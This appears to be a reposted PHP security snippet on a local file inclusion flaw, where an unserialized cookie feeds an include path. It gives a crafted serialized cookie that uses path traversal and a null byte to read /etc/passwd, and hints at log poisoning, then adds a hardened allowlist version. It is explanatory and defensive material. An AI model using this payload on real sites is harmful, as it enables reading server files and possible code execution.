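[code lang=php]
<?php
// Vulnerable: the attacker-controlled cookie is unserialized and its 'lang'
// value is concatenated into the include path without any validation.
$settings = unserialize($_COOKIE['user_settings']);
include("include/lang/" . $settings['lang'] . ".php");
?>
[/code]

Quite obvious: you need to set a cookie like this:

[code]
user_settings=a:1:{s:4:"lang";s:32:"../../../../../../../etc/passwd[null char]";}
[/code]

It is the result of:

[code lang=php]
<?php
$settings = array();
// 31 path characters plus one null byte give the s:32 length seen above;
// the null byte cuts off the ".php" suffix appended by the include.
$settings['lang'] = "../../../../../../../etc/passwd\x00";
$settings = serialize($settings);
echo $settings;
?>
[/code]

The same applies to Apache logs or something similar, where you have injected some PHP code.

Reposted from: http://kummb.baihongyu.com/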
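A hardened counterpart to the vulnerable include above, as an added example that is not part of the original post: the cookie is parsed as JSON instead of being passed to unserialize(), and the lang value is used only if it is on a fixed allowlist. The language list, the JSON cookie format and the function name resolve_lang_file() are assumptions made for this example.

```php
<?php
// Added example: hardened handling of the user_settings cookie.
// Assumptions (not from the original page): the supported language list,
// JSON as the cookie encoding, and the helper name resolve_lang_file().

const SUPPORTED_LANGS = ['en', 'de', 'fr']; // hypothetical allowlist
const DEFAULT_LANG    = 'en';

function resolve_lang_file(?string $cookieValue, string $baseDir = 'include/lang'): string
{
    $lang = DEFAULT_LANG;

    if ($cookieValue !== null) {
        // json_decode() with assoc=true yields only arrays and scalars,
        // so no object is ever instantiated from client-supplied data.
        $settings = json_decode($cookieValue, true);

        // Accept the value only if it is exactly one of the known languages.
        // Anything containing "../", a null byte or any other unexpected
        // character fails the strict comparison and falls back to the default.
        if (is_array($settings)
            && isset($settings['lang'])
            && is_string($settings['lang'])
            && in_array($settings['lang'], SUPPORTED_LANGS, true)) {
            $lang = $settings['lang'];
        }
    }

    return $baseDir . '/' . $lang . '.php';
}

// In the application this would replace the original two lines:
//   include resolve_lang_file($_COOKIE['user_settings'] ?? null);

// Constructed sample cookie values, including the one from the post.
$samples = [
    'valid'      => '{"lang":"de"}',
    'traversal'  => '{"lang":"../../../../../../../etc/passwd\u0000"}',
    'serialized' => 'a:1:{s:4:"lang";s:2:"de";}',
    'missing'    => null,
];

foreach ($samples as $name => $cookie) {
    printf("%-10s => %s\n", $name, resolve_lang_file($cookie));
}
```

Only the first sample resolves to include/lang/de.php; the traversal string, the legacy serialized value and the missing cookie all resolve to include/lang/en.php.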